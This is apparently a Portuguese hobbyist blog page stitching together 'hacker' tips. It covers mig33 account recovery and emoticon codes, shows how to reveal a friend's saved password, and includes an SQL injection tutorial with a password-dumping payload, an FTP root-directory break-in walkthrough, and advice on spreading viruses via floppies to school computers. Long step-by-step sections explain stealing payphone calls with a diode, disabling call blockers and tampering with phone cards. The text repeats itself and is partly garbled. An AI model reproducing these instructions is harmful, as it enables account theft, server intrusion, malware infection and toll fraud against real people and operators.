quinta-feira, 9 de junho de 2011

RECUPERAR NICK HAKEADO

Ter De volta SEU ID
HACKEADO Olá amigo... Se teu id foi
cortado,hackeado então você
pode pegá-lo de volta...
Facil?nao muito,enviando,sim,
por apenas enviar um e-mail
para mig33... (contact@mig33.com), A dar os
detalhes n0 e-mail tais como
(veja abaixo)..,isto è,do
exemplo...
hi...i'm (seu nome), from (seu
pais) ,i'm here with a complain.My id= (seu nick
hackeado) ,being hacked by
hackers,they did change my
password and register cell
number.So forget password
option not helping to get my password.
The detail of my id given
below,
1) id name=xxxxxx
2) last password=xxxxxx
3) cell number where id was registered=xxxxxxxxxx
i kindly request to u plz reset
it at given number
xxxxxxxxxx(por favor
introduzir o numero real do
seu nick o que ativaste o nick com ele no 1o dia da sua
entrada no mig33)hope u will
reset it soon,kind regards,
assignature(seu nick)
mande o email para
contact@mig33.com ,e dai que a mig33 team vai apagar os
dados atuais ativados pelo
hacker e retornar o id ao o
numero real do id,Boa Sorte.....

PROTEGER SEU NICK DOS HAKEADORES

Ter De volta SEU ID
HACKEADO Olá amigo... Se teu id foi
cortado,hackeado então você
pode pegá-lo de volta...
Facil?nao muito,enviando,sim,
por apenas enviar um e-mail
para mig33... (contact@mig33.com), A dar os
detalhes n0 e-mail tais como
(veja abaixo)..,isto è,do
exemplo...
hi...i'm (seu nome), from (seu
pais) ,i'm here with a complain.My id= (seu nick
hackeado) ,being hacked by
hackers,they did change my
password and register cell
number.So forget password
option not helping to get my password.
The detail of my id given
below,
1) id name=xxxxxx
2) last password=xxxxxx
3) cell number where id was registered=xxxxxxxxxx
i kindly request to u plz reset
it at given number
xxxxxxxxxx(por favor
introduzir o numero real do
seu nick o que ativaste o nick com ele no 1o dia da sua
entrada no mig33)hope u will
reset it soon,kind regards,
assignature(seu nick)
mande o email para
contact@mig33.com ,e dai que a mig33 team vai apagar os
dados atuais ativados pelo
hacker e retornar o id ao o
numero real do id,Boa Sorte.....

Ola,é muito facil proteger o seu
nick dos hackiados.
Para tal tens que trocar do
seu password por um password
grande.
E que no minimo o seu password deve ter 20
digitos,assim estarás a
proteger o seu nick é facil
ném.boa sorte

COMO DESCOBRIR PASWORD DO OUTRO USUARIO

; É muito fácil ver password do
teu amigo ou de uma pessoa
conheçida.
Para ver o password é so
pedires emprestado o telemóvel
do seu amigo e entrar no aplicativo mig33...
E la encontraras uma parte
aonde vêm username e
password,entra no password e
clica 25 ao mesmo tempo.
Logo porcima apareçerá o nome do password,facil ném

Historia do mig33

A Empresa Mig33 foi lançado
em dezembro de 2005 como a
primeira comunidade de
Internet móvel global e
rapidamente se espalhou ao
redor do mundo. Com milhões de clientes em
mais de 200 países, o serviço
tem levado o mundo pela
tempestade, espalhando-se
sobre a força de
recomendações de usuários, trazendo o poder da Internet
para qualquer pessoa com um
telefone celular.
O conceito para mig33 foi
originado em uma cafeteria da
biblioteca, entre os fundadores Steven Goht e Mei Lin.... Os dois sentaram-se com um
pedaço de papel em branco e
um objetivo de descobrir uma
maneira para os adolescentes
enviar mensagens de texto,
tanto quanto eles queriam, sem quebrar o banco de
dados. Idéias fabricado naquele papel
que levou a uma proposta de
negócio e, eventualmente,
para mig33.
A empresa foi fundada na
crença de que a ascensão de VoIP e tecnologias sem fio
estão redefinindo a forma
como as pessoas se conectam
e encontrar comunidade. Mig33
aproveita a mudança na
indústria de telecomunicações de administrar e tarifar a
rede, aos serviços de entrega
e valor do cliente. Nesta
segunda era da Internet, há
novas oportunidades para
criar propostas de valor que entregam o cliente e valor
accionista.
Hoje, mig33 abriu o poder da
Internet para a comunidade
global móvel.
É mais do que simplesmente navegar na Web -mig33

AQUI ESTAO OS CODIGOS PARA EMOTICONS

/agree /apologizes /argh
/bark /bearhug /beer /beg /blink /blowk /blush /boo /bored /bow /brb /burp /caff /cheer /chicken
/chuckle /cmon /comfort /confuse /congrat /cringe /cry /doh /drool /drunk /duck /eek /eh /embrace /faint /fart /firebreath /flirt /french /frown /gasp /gee /giggle /glare /gn /greet /grin /groan
/happy /hfive /hiccup /hmm
/hold /honor /howl /hug /hum /joy /kiss /lag /laugh /listen /loser /love /martian /miss /mmm /moo /mumble /nod /phew
/pinch /poke /ponder /power /purr /relax /rose /ruffle /salute /scream
/seduce /shiver
/shmoo /shrug /shy /sick
/sigh
/slap /smile /smirk /sneeze /snore /snuggle /sorry /spit /spock /squirt /stare /strut /tag /tantrum /thank /tpyo /warcry /wave /whistle /whop /wink /wohoo /worship /worthy /yawn /yeah Especial Emotes /8ball /fortune /me /roll Jogos Olimpicos /beibei /challenge /champion /cheers
/frenzy /go /gold /huanhuan /jingjing /lose
/luck /medal /nini /proud /record /taunt
/torch /welcome /win /winner /yingying Fotebol Emotes: /freekick /goal /handball /kick /offside /penalty /red

Codigos do mig33

Aqui está a lista de emoticons


Geral
/agree
/apologizes
/argh
/bark
/bearhug
/beer
/beg
/blink
/blowk
/blush
/boo
/bored
/bow
/brb
/burp
/caff
/cheer
/chicken
/chuckle
/cmon
/comfort
/confuse
/congrat
/cringe
/cry
/doh
/drool
/drunk
/duck
/eek
/eh
/embrace
/faint
/fart
/firebreath
/flirt
/french
/frown
/gasp
/gee
/giggle
/glare
/gn
/greet
/grin
/groan
/happy
/hfive
/hiccup
/hmm
/hold
/honor
/howl
/hug
/hum
/joy
/kiss
/lag
/laugh
/listen
/loser
/love
/martian
/miss
/mmm
/moo
/mumble
/nod
/phew
/pinch
/poke
/ponder
/power
/purr
/relax
/rose
/ruffle
/salute
/scream
/seduce
/shiver
/shmoo
/shrug
/shy
/sick
/sigh
/slap
/smile
/smirk
/sneeze
/snore
/snuggle
/sorry
/spit
/spock
/squirt
/stare
/strut
/tag
/tantrum
/thank
/tpyo
/warcry
/wave
/whistle
/whop
/wink
/wohoo
/worship
/worthy
/yawn
/yeah Especial Emotes
/8ball
/fortune
/me
/roll


Jogos Olimpicos
/beibei
/challenge
/champion
/cheers
/frenzy
/go
/gold
/huanhuan
/jingjing
/lose
/luck
/medal
/nini
/proud
/record
/taunt
/torch
/welcome
/win
/winner
/yingying


Fotebol Emotes:
/freekick
/goal
/handball
/kick
/offside
/penalty
/red
/yellow

Invasão de website

Você provavelmente já ouviu falar que um determinado grupo de 'crackers' pichou o website de uma instituição. Esse tipo de notícia chama a atenção da mídia e, infelizmente, é cada vez mais frequente.

O próprio site do HackerTeen já foi pichado por crackers, assim como o securityfocus.com, mcafee.com (na verdade o site de serviços de segurança do sites deles), hackinthebox.org e zone-h.org. Todos apresentaram  ulnerabilidades e devem ter evoluído sua segurança após a pichação, mas ainda assim não podem garantir que estão 100% seguros e nunca mais serão pichados.

Sites famosos estão mais sujeitos a ataques, pois conferem notoriedade e fama ao pichador. Aliás, nem todo cracker está interessado em dinheiro e fraudes. A maioria está interessada em ganhar notoriedade entre seus pares, outros crackers.

Identificando vulnerabilidades...

Uma classe de vulnerabilidades que permitem execução de código malicioso são os ataques de Injeção de Código, ou como são conhecidos na Internet, os famosos "injections". Eles permitem que um atacante insira um determinado código ou mesmo reescreva todo o conteúdo de um website. Para que isso ocorra, o site deve estar vulnerável a este tipo de ataque.

Principais técnicas...

Dentre as técnicas de injection disponíveis, as mais famosas são as técnicas de SQL Injection. Estas técnicas aproveitam falhas na aplicação ou práticas ruins de desenvolvimento para explorar o servidor remoto.

Na prática...

Para termos uma idéia de como isso ocorre, vamos fazer uma busca simples no Google. Vamos procurar pelo meu nome, e então, observe sua barra de endereço:

http://www.google.com.br/search?hl=pt-BR&q=yago+&btnG=Pesquisar&meta=

Note que este endereço é composto de uma seqüência de variáveis, cada uma com um valor diferente. A variável q (q=yago) é a variável utilizada pela aplicação do Google que faz a busca em um banco de dados, e então apresenta o resultado ao usuário.

Vamos fazer outra busca. Vamos procurar pelo nome Yago + hackerteen:

http://www.google.com.br/search?hl=pt-BR&q=yago+%2B+hackerteen&btnG=Pesquisar&meta

A variável q agora possui os valores yago+%2B+hackerteen, indicando agora ao software para buscar pelas palavras "Yago" e "Hackerteen" no banco de dados.

Faça você este teste...

Copie o endereço acima, e cole no seu navegador, substitua a palavra 'Yago' por 'segurança', e então aperte 'Enter'. Note que tanto o resultado da busca quanto as palavras na caixa de pesquisa foram alteradas, ou seja, colocamos um valor na URL e ela afetou o comportamento e a visualização da página da aplicação Google, o mesmo príncipio utilizado no SQL injection.

Claro que isso não é uma invasão, e não foi usada nenhuma técnica especial além da observação.

Sabendo que este comportamento é possível em websites e aplicações web, os crackers passam a observar e testar o site do alvo em busca de alguma informação que possa levar a uma falha, como por exemplo, uma consulta que retorna erro ou uma página inexistente, ou seja, ele busca um indicio que é possível realizar SQL Injection na página.

Como pensa o cracker...

Um cracker pode fazer uma consulta incluindo operadores especiais no Google com a seguinte string:
allinurl: produto.asp?id=

A busca acima poderia indicar a existência de listagens de produtos em um site de comércio eletrônico. Em pouco tempo, o cracker consegue uma lista de sites que correspondem a essa busca. De posse desta lista, o cracker começa a procurar por vulnerabilidades.

Vamos imaginar que o seguinte site foi encontrado: www.sitealvo.com.br/produtos.asp?id=666
Para testar o site, o atacante simplesmente acrescenta um ' ao final da URL, digitando assim o seguinte endereço: www.sitealvo.com.br/produtos.asp?id=666'

Um site programado com possíveis problemas de segurança, retornará um erro semelhante a este:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ''.
/produto.asp, line 12


Ao contrário, se a programação do site estiver mais cuidadosa, ele retornará algo como a seguinte frase:
"Caracteres Inválidos no campo id"

Conhecimento em programação...

É ai que entra o conhecimento em programação do cracker. A partir da localização deste erro e do conhecimento de que existem práticas descuidadas de programação, ele poderá inserir comandos e scripts que serão executados pelo site da vítima, levando à pichação e mesmo à fraude, como alteração de preço de produtos, negação de serviços, implementação de backdoors e outras atividades ilicítas.

Exemplo: www.sitealvo.com.br/produtos.asp?id=666 and 'SELECT password FROM costumers'
Com este comando, o cracker traria as senhas dos clientes cadastrados no site, por exemplo

Reforce a segurança do seu website...

Para se proteger desses ataques, é necessário utilizar boas praticas de programação aliadas a uma política de segurança local dos servidores web, ou "hardening". Para prevenir alguns problemas é recomendado que alguns parâmetros de PHP sejam configurados no php.ini:
  • allow_url_fopen = Off
  • safe_mode = On
  • magic_quotes_gpc = On
  • display_errors = Off

Você estará protegendo...

Este conjunto de instruções impedem que URLS externas sejam interpretadas pelo PHP, obrigam as aplicações a rodarem com UID/GID definidas, protegem caracteres especiais utilizadas em SQL Injection, como o ' (aspas) do exemplo acima e a última impede que mensagens de erros sejam mostradas no browser, dificultando a análise do atacante.

Para os servidores de banco de dados...

Utilize criptografia nas senhas, utilize privilégios distintos para o dono do banco e para os objetos do banco. O programador deve sempre fazer tratamentos das querys e sempre checar os dados antes de enviar para o sistema gerenciador de bancos de dados. Por exemplo, se você espera que o usuário digite um número, tenha certeza de que o dado realmente é um número válido, antes de realizar a consulta.

Para a servidor web...

  • Tenha cuidado com as permissões do diretório do servidor web, permissões incorretas de gravação em um arquivo php, por exemplo;
  • Fique atento às permissões especiais para diretórios;
  • Esconda as assinaturas que exibem a versão do servidor e módulos utilizados: Para o Apache, habilite a opção "server signature off" no arquivo de configuração;
  • Mantenha os serviços sempre atualizados, e não mantenha instalado aquilo que você não pretende utilizar, por exemplo, NFS em um servidor Web;
  • Tenha cuidado com as permissões dos executáveis em servidores web. Um atacante pode usar ferramentas simples como clientes FTP e clientes web (o wget, por exemplo) para iniciar o download de código malicioso ou kits de invasão para o servidor em ataque;
  • Tenha cuidado com os parametros de montagem de dispositivos;
  • A partição /tmp é o alvo preferido de crackers porque possui permissão de escrita, leitura e execução para todos. O uso de técnicas simples, como configurar a partição com parâmetros noexec impede que o cracker execute alguma ferramenta a partir do /tmp;

Observe as permissões especiais...

Existem permissões especiais, como o SUID BIT, que permitem que qualquer aplicação seja executada com permissões de root, o que pode comprometer a segurança. Faça testes periódicos e elimine arquivos com permissão SUID.

Uma maneira simples de efetuar esta busca é executar o comando: # find / -perm -4000
  • Sempre analise o conteúdo das pastas que podem ser escritas pelo usuário que executam os serviços web;
  • Sempre cheque a integridade dos arquivos disponibilizados no seu servidor web. A instalação de uma aplicação automatizada para isso, como o AIDE, facilita bastante a criação das somas de checagem e sua conferência;
  • Analise constantemente os registros de atividades (logs) do seu servidor;
  • Analise constantemente as informações vitais do seu servidor: consumo de disco, banda e memória. Alterações significativas podem ser sinal de algo errado;
  • Elimine serviços não usados;
  • Mantenha uma política de atualização de software;
  • Saiba quem acessa e o que faz em seu servidor. Uma política de acesso controlada com uso de sudo e registro de operações é fundamental;
  • Documente: A inexistência de documentação pode levar a soluçoes de contorno que podem expor a segurança;
  • Comunique: Modificações não comunicadas e não analisadas podem levar a problemas de segurança;
  • Mantenha-se antenado: Busque informações sobre problemas de segurança enfrentados por outros administradores ou nos boletins de segurança.
  • Observe as permissões especiais...
  • Utilize práticas de desenvolvimento seguras;
  • Faça tratamento de erros nas mensagens;
  • Nunca acredite nos dados que foram digitados, sempre efetue validações. Tanto no lado cliente como no lado servidor;
  • Crackers são criativos, sua defesa também é a criatividade. Passe um bom tempo imaginando o que faria se fosse um cracker.;
  • Não acredite que algo é seguro. Ele pode estar seguro, mas mentes criativas estão tentando encontrar formas de torna-lo inseguro.
Teste as aplicações antes que alguém faça isso por você!
Apesar dessas medidas serem interessantes, elas não garantem segurança 100%. Nenhuma medida terá 100% de garantias. A insegurança estará sempre à frente da segurança, basta assistir ao filme "Prenda-me se for capaz"
Para saber mais: http://www.owasp.org/

Invadindo site via FTP

Primeira coisa que deve saber...
Não fique, em hipótese alguma mais de 5 minutos,
senão é cadeia na certa, á não ser que a conta seja "HACKEADA".
Siga os passos:
1º PASSO - No DOS digite FTP;
2º PASSO - Eu aconselho a digitar "?" para ver so comandos do FTP;
3º PASSO - Digite "open". Irá aparecer a
mensagem "TO" ou"PARA";
4º PASSO - Escolha um servidor de FTP (ftp.mandic.com.br, ftp.sol.com.br, ftp.plugnet.com.br, etc.);
5º PASSO - Espere conectar e digite "quote cwd~root" ou "quote cwd~sys";
6º PASSO - No PASSWORD coloque "quote pass ftp";
7º PASSO - Você vai entrar no diretório home/root, dê um "
cd/etc";
8º PASSO - Pronto, você está no lugar certo, mas não se esqueça, as senhas são criptografadas, não adianta copiá-las, a não ser que tenha um programa para descriptografá-las.


OBs.: Alguns renomeiam o arquivo VNBT.386 no diretório windows\system para não conseguirem te nucar ou te invadir... Aconselho que renomeie-o também.

HACKER

Adolescentes à beira da piscina; Tamanho real=240 pixels de largura
hacker d+++++++MORTE SER UM HACKER DESPREVINIDO




Adolescentes dançando; Tamanho real=180 pixels de largura
ATENçAO VIRUS NAO E BRINQUEDO
CUIDADO SE VC NAO SABER ULTILIZAR AS INFORMAçOES VC VAI SE FERRAR
ANTENCIOSAMENTE:
Carlos Frank James

C:\> type carta.txt

Os codigos acrescentados ao texto alteram a tecla x (ou qualquer tecla, nao importa) de forma que, ao inves de escrever x na tela ela aciona uma macro que ativa a formatacao do disco rigido.

Existe um software, chamado CHK4BOMB, disponivel no subdiretorio msdos/virus de qualquer "mirror" do Simtel20 que ajuda a detectar a existencia desse tipo de programa. Os antivirus comuns dificilmente detectam, a nao ser em casos mais famosos.

Virus de Arquivo - ex: Jerusalem, Athenas, Freddy

Infectam arquivos executaveis ou de extensao .SYS, .OVL, . MNU, etc. Estes virus se copiam para o inicio ou fim do arquivo. Dessa forma, ao se chamar o programa X, o virus se ativaria, executaria ou nao outras tarefas e depois ativaria o verdadeiro programa.

Atualmente existem uma terceria e quarta categorias

Virus Multi-partite- ex: Whale, Natas




. - = /COMO FAZER VIRUS FORMA TECN. \ = - .

© Frank hacker
caveiras27.gif
vcs saber como se origina um virus?


cavTamanho real=180 pixels de largura

explicações tecinicas como fazer dados tecnicos 2
 
 
 
vírus nada mais é do que um programa que tem um único objetivo: causar algum dano no computador de alguém. Ele se instala em todas as unidades qm que é possível gravar dados: disco rígido, disquetes, unidades de rede, ZIPDrive etc.
 Ainda não existe um vírus que seja capaz de queimar o seu modem, o seu teclado ou o seu comuputador. Para removê-lo, basta formatar o micro ou apagar fisicamente todos os arquivos existentes, pois dessa forma o vírus também será removido, afinal ele é um programa.
 Existem vírus que infectam somente arquivos executáveis (.EXE e .COM), outros somente os arquivos .DOC, .SYS, etc, e existem alguns que infectam a trilha 0 do seu computador, também conhecida como setor de boot ou MBR.


 Trabalhando com vírus:

 Um vírus é um programa e por isso precisa ser executado para funcionar, certo? Errado! os vírus de MBR detonam o computador pelo simples fato de serem copiados. Não precisa nem executar, você será automaticamente infectado.
 Nunca descompacte um vírus em seu winchester, isso não deve ser feito em hipótese alguma. Também não teste nenhum vírus no seu proprio micro para ver o que acontece.
 Se você quiser pegar algum vírus sem se contaminar, pegue-o compactado, pois compactado ele se torna inofensivo. Agora o bicho vai pegar quando você descompactar o maldito.
 Com o vírus já no seu winchester compactado (ZIP), insira um disquete e descompacte-o lá, use o utilitário WinZip.
 Pronto, o vírus foi descompactado dentro do disquete. Agora ele está contaminado. hehehehe. O próximo passo você já saber: leve esse disquete para algum micro que deseja infectar e execute o vírus ou então só copie ele para o HD e espere que algum otário vá lá mexer. Eu só não digo para vocês testarem o vírus em computadores da escola, porque meu professor pode estar lendo isso agora e não ia gostar de nada disso.
 Depois de infectar o disquete, não mexa mais nele. Deixe-o quieto lá num canto, pois existem vírus que são ativados quando você dá um simples "DIR" no disquete. Ou formate o disquete no computador da escola. Tô brincando hein professor...heheh... 8


 Como se identificar os vírus:

 A melhor maneira de identificar os vírus é através dos anti-vírus (se você não soubesse dessa, se mate!!!).
 Mas se você passa o anti-vírus e ele não detecta nada, mas você suspeita que o arquivo é um vírus, uma grande possibilidade de ser um vírus desconhecido.
 - Verifique o tamanho do arquivo. Se ele tiver menos de 3Kb, as chances de que se trata de um vírus são grandes.
 - Através do EDIT no MS-DOS, edite os arquivos suspeitos. A extenção .EXE é quase impossível, mas os arquivos .COM contém as informações essenciais e é possível visualiza-las. Nesse caso, se aparecerem textos do tipo "fock you", "infect", "hahaahah", "you suck", etc pode suspeitar que é um vírus.

 Como faço para criar meu próprio vírus ?


 Hoje em dia é algo muito simples. Antigamente usava-se a linguagem de programação Assembly. Até hoje é usada, mas é muito complicado, só quem manjava muito sabia fazer vírus. Nos dias de hoje, existem programas que têm uma unica função: contruir vírus. São os chamados "laboratórios de vírus".
 Para ficar famoso, você precisa ter muita sorte. Depois de criar o vírus, compacte num arquivo .ZIP o vírus executável (EXE ou COM) junto com a fonte dele (ASM). Em seguida, envie um e-mail para as empresas de anti-vírus (McAfee, Norton etc...) com o seu vírus anexo e diga que foi infectado por esse vírus.
 O seu vírus será analizado pelos técnicos e se eles o considerarem perigoso, irão criar um "antídoto" para ele. Se isso for feito, alguns meses depois você já poderá ter sido incluído na lista mundial dos vírus.



 Nessas ferias, aconteceu um encontro de estudantes de Comunicacao. Numa de penetra, entrei numa festa e apesar da quantidade de mulher, encontrei um pessoal que me apresentou ao Ailton da UFMG. Conversa vai, conversa vem, entramos naquele papo incrivelmente chato que e' as possibilidades da Internet no Brasil e a futura reuniao de Hackers brasileiros e internacionais. No meio de tanta mulher, conversar sobre isso..
 Nos dias seguintes, foi o lance de trocar informacoes. Ele sabia, conhecia varias pessoas que tem essa fixacao por computador. Tinha a ideia de montar o grupo, mas nao o como fazer a coisa. Eu tinha Megabytes e Megabytes de material altamente significativo sobre o assunto, armazenado em dois anos de pesquisa na rede Internet, mas so' a ideia de montar uma lista e' que tinha vingado. Pensando e pensando no assunto, cheguei a algumas conclusoes:

Efetuando ligações gratuitas ultilizando o diodo

Este é facil de fazer mas com um noot book

firme.gif




3.2 - Efetuando ligações gratuitamente utilizando um diodo
O diodo é um componente eletrônico que possui diversas utilizações. Podemos resumir seu funcionamento basicamente na seguinte síntese: Um diodo (ou junção PN), permite que a corrente circule em apenas uma direção dentro de um circuito.
Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em qualquer casa de componentes eletrônicos. Vamos precisar também de um resistor com valor nominal de 22K e potência de 1W. Basta que você ligue o diodo em paralelo com o resistor (conforme tenta mostrar a ilustração abaixo) e, em seguida, descasque os fios do telefone e ligue cada uma das pontas obtidas com o diodo e o resistor neles.



Lembre-se: você vai apenas descascar os fios do orelhão!!! Se você cortá-los, ele vai ficar sem linha.




||



|| fio do telefone



||



||



+------------------++-------------------+



| |



| |



| +----¦¦¦¦¦¦¦----+ |



| / diodo \ |



ponta +_--------+ +--------_+ ponta



| \ / |



| +----¦¦¦¦¦¦¦----+ |



| resistor |



| |



+------------------++-------------------+



||



|| fio do telefone



||



||

Para executar esta tarefa, eu aconselho que você descasque os fios dos orelhões que você utiliza com mais freqüência pois, devido ao fato dos fios do telefone público serem muito grossos, não é um trabalho que se possa fazer tranqüila e rapidamente sem ser notado. Você deverá observar também a polarização correta a ser utilizada. Você perceberá isso facilmente pois, quando você ligar o diodo de maneira errada, o orelhão vai ficar sem linha.

Uma dica pessoal: os telefones de cabine e os de cartão são mais fáceis de serem violados. Alguns orelhões comuns tem uma proteção blindada que impedem o acesso ao cabo telefônico. Embora mesmo assim seja possível puxar o fio com um gancho, que você enfiará do lado esquerdo do aparelho telefônico, entre o telefone e uma grade preta de sustentação que fica atrás dele, eu aconselho que você evite esses tipos.

Vamos voltar um pouco para a parte técnica da coisa.



O diodo que estamos utilizando vai funcionar da seguinte maneira:

Quando uma ligação é completada de um telefone público, a central inverte a polarização do telefone de -48 para 48 volts. Quando o aparelho telefônico percebe isso, ele pede uma fixa. É aí que entra em funcionamento o nosso querido diodo. Ele permite que a tensão caia até 0 volts, mas não permite que ela se torne positiva. Dessa forma o orelhão não vai pedir a ficha. Nesse caso o resistor está funcionando apenas como um dissipador de potência, para que você não dê o azar de queimar o diodo (não que ele seja caro, é que em algumas localidades ele pode ser uma peça rara que custa R$0,10) e ficar sem telefonar. Mesmo se você não achar nenhuma loja que venda, pegue uma placa antiga de alguma coisa que tenha queimado. Elas sempre tem diodos. Você deve procurar uma peça pequenininha que tem dois terminais, é preta e normalmente estará escrito IN qualquer coisa.

3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum
Primeiro, você deve tomar os processos citados anteriormente para descascar os fios do telefone. Em seguida você deve conseguir um aparelho telefônico comum e ligar cada uma das pontas dos fios dele nos fios do orelhão.
Para facilitar a sua vida, eu aconselho que o seu telefone seja o menor possível e que você prenda um jacaré (pequeno gancho achado em qualquer loja de componentes eletrônicos) em cada uma das pontas do seu telefone, para facilitar a ligação no orelhão.

Aí é só efetuar a ligação normalmente.

3.4 - Conectando notebooks a telefones públicos
O processo para se conectar notebooks a orelhões, é igual ao de se conectar telefones comuns. Resumirei nesse item, algumas considerações a respeito da fiação do notebook, que segue os padrões da FCC Americana e é um pouco diferente da nossa. O conector do fio do notebook, que é do tipo jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades.

Estes dois fios centrais, são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles também.

Basta conectar-se a BBS's da mesma forma que você se conecta em casa.

Caso você queira testar se está tudo OK, abra um programa de terminal qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de linha é que está tudo OK.

3.5 - Observação
As chamadas telefônicas se dividem em três categorias: locais, DDD regionais e interurbanas (ou nacionais).
As chamadas locais são aquelas efetuadas dentro de sua cidade, as DDD regionais são as ligações feitas dentro do complexo urbano onde você mora, no caso de São Paulo, as chamadas DDD regionais são aquelas feitas para as cidades que fazem parte da Grande São Paulo: Jundiaí, Santo André, São Bernardo, etc. As chamadas interurbanas são aquelas feitas para fora do complexo urbano onde você está localizado. Usando São Paulo como exemplo, podemos citar o interior do estado de São Paulo e cidades localizadas em outros estados.
POR FAVOR NÃO CLICK NA FIGURA ABAIXO!!!1

reproduçao.gif

DESATIVAR E FAZER LIGAÇÕES COM E APERELHO QUE BLOQUEI CHAMADA E LIGAÇÕES

((((( Phucking block line )))))))
 


Essa tecnica e' meio forcada, mas funciona.
Nosso alvo sao aqueles aparelho que bloqueiam chamadas telefonicas o
tao temido BLOCK LINE.
Bem isso e'soh uma parte pq ja estamos imaginando uma materia futura so-
bre o sistema mas o englobando de forma muito melhor e falando mais dos
detalhes tecnicos. Por enquanto espero isso quebre o galho...
Primeira coisa que vcs devem fazer e' descobrir se o problema e' realmen-
te o BLOCK LINE e se a linha nao foi bloqueada na companhia telefonica.
Antes de tudo olhe se a senha padrao que e' 222 nao foi mudada.
Agora procuro o telefone principal da casa, aquele que quando desligado
desliga a todos da casa.
Acho? Beleza, abra ele com uma chave de fenda e procure uma caixinha pre-
ta escrita block line.
Abra agora tb o block line, com cuidado pra nao quebrar. Apos ter feito
isso tire a pelicula que cobre a placa do aparelho block line e exponha
o circuito a luz fluorescente ( raios ultra-violeta). Pronto, vc apagou
todas informacoes da placa...
Agora e' claro que os pessoas nem vao desconfiar qual o problema ;)


Como ligar gratuitamente em orelhoes a cartao
Ponha o cartao e ligue normalmente
Quando a pessoa atender aperte o 0(zero) e segure.
Pronto agora suas fichas (unidades do cartao) nao vao cair mais!

Obx: Nao solte o dedo do 0(zero) se nao as fichas vao voltar a cair,
essa e a parte chata!


Algumas dicas pra fazer cartoes que realmente funcionam
Ok, os cartoes desse tipo de orelhao, funcionam da seguinte forma:
Eles sao formados por minusculos microfusiveis queimados por indutancia,
assim, quando vc insere o cartao no orelhao, atraves de um "sensor", ele
verefica quantos microfusiveis ainda estao "ligados". Quando vc conhece
algo, vc pode engana-lo, entao, um metodo q tem funcionado por quase to-
do brasil, eh o de vc pegar o seu cartao, e fuça-lo todo.

As dicas que funcionam:
Esmalte:

Pegar um cartao telefonico comum e passar um esmalte incolor ( base ) na
tarja do cartao. Parece que esta base impede o cartao de "queimar" os
creditos, o mesmo pode ser tentado em cartao de fliperama.
Pinte a tarja de maneira que fique fina para impedir que o cartao fique
grosso demais e nao passe na maquina.


Papel Aluminio

E' soh pegar um pedaco de papel aluminio e enrolar no cartao, pode usar a
vontade...


Silicone

Este é o metodo mas facil e comprovado por mim. pegue aquela silicone
(transparente) e passa bem fina (fina mesmo) camada de silicone por cima e
deixa secar mais tarde vc vera um cartão que funciona infinitivamente


Cartoes Infinitos

Atençao: esta dica tem que ser realizada com muita paciencia pois se vc errar
uma coisa estraga tudo!!
Primeiramente consiga um estupido cartao telefonico zerado !
Lixe ele com aquela lixa bem fina e deixe-o em repouso durante 3 ou 4 minutos.
Passado entao cerca de 3 a 4 minutos percebera que a tinta do cartao
nas costas da figura saiu... quando a tinta nas costas
da figura ja estiver totalmente desaparecida voce percebera como a
confeccao do cartao e' uma merda.
É um negócio tipo assim:

costas do cartão
-----------------
| o-o o-o o-o | Em cada bolinha ligada por um fio que nem diz o desenho ( o-o )
| o-o o-o o-o | coloque um papel laminado bem fino para interligar as duas bolinhas.
| o-o o-o o-o | Ou tambem da pra usar fio bem fino.
| o-o o-o o-o |
| o-o o-o o-o |
-----------------

_____ _____
/ \ / \
/ \ / \
| bolinha 1 | ============ | bolinha 1 | Obs: Ficou Orrivel
\ / \ /
\ _____ / \ _____ /



cubra da bolinha 1 até a 2 com o nosso amigo papel laminado ou fio fino





Efetuando ligacoens gratuitas de um telefone publico utilizando um diodo

O diodo e um componente eletronico que possui diversas utilizaçoens.
Podemos resumir seu funcionamento basicamente na seguinte sintese:
Um diodo (ou junaum PN), permite que a corrente circule em apenas uma
direçaum dentro de um circuito.
Ao se utiliza-lo para o fim aqui desejado, vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em
qualquer casa de componentes eletronicos. Vamos precisar tambem de um
resistor com valor nominal de 22K e potência de 1W.

Maums a obra !

Basta que voce ligue o diodo em paralelo com o resistor (conforme tenta
mostrar a ilustraçaum abaixo) e em seguida, descasque os fios do telefone
e ligue cada uma das pontas obtidas com o diodo e o resistor neles.
Lembre-se: voce vai apenas descascar os fios do orelhaum !!! Se voce
corta-los, ele vai ficar sem linha.

||Fio do telefone
||
+-------------------++------------------+
| |
| + {{{{{{{{{}}}}}}}}}}} - |
| /diodo\ |
+=============+ +==========+
| \resistor/ |
| + |||||||||||||||||||| + |
| |
| |
+-------------------++------------------+
||
||

Para executar esta tarefa, eu aconselho que voce descasque os fios dos
orelhoens que voce utiliza com mais frequencia pois, devido ao fato dos
fios do telefone publico serem muito grossos, naum e um trabalho que se
possa fazer tranquilo e rapidamente sem ser notado. Voce dever observar
tambem a polarizaçaum correta a ser utilizada. Voce pode perceber isso
facilmente pois, quando voce ligar o diodo de maneira errada, o orelhaum
vai ficar sem linha.
Uma dica pessoal: os telefones de cabine e os de caraum saum mais
faceis de serem violados. Alguns orelhoens comuns tem uma proteçaum
blindada que impedem o acesso ao cabo telefonico. Embora mesmo assim
seja possível puxar o fio com um gancho, que voce deve enfiar do lado
esquerdo do aparelho telefonico, entre o telefone e uma grade preta de
sustentaçaum que fica atras dele, eu aconselho que voce evite esses
tipos.
Vamos voltar um pouco para a parte tecnica da coisa.
O diodo que estamos utilizando vai funcionar da seguinte maneira:
Quando uma ligaçaum e completada de um telefone publico, a central
inverte a polarizaçaum do telefone de -48 para 48 volts. Quando o
aparelho telefonico percebe isso, ele pede uma fixa (ou uma unidade).

Ai e que entra em funcionamento o nosso querido diodo.
Ele permite que a tensaum caia ate 0 volts, mas naum permite que ela se
torne positiva. Dessa forma o orelhaum não vai pedir a ficha (ou unidade
de cartão).
Nesse caso o resistor esta funcionando apenas como um dissipador de
potencia, para que voce naum de o azar de queimar o diodo (naum que ele
seja karo, e que em algumas localidades ele pode ser uma peça rara que
custa R$0,15) e ficar sem telefonar. Mesmo se voce naum achar nenhuma
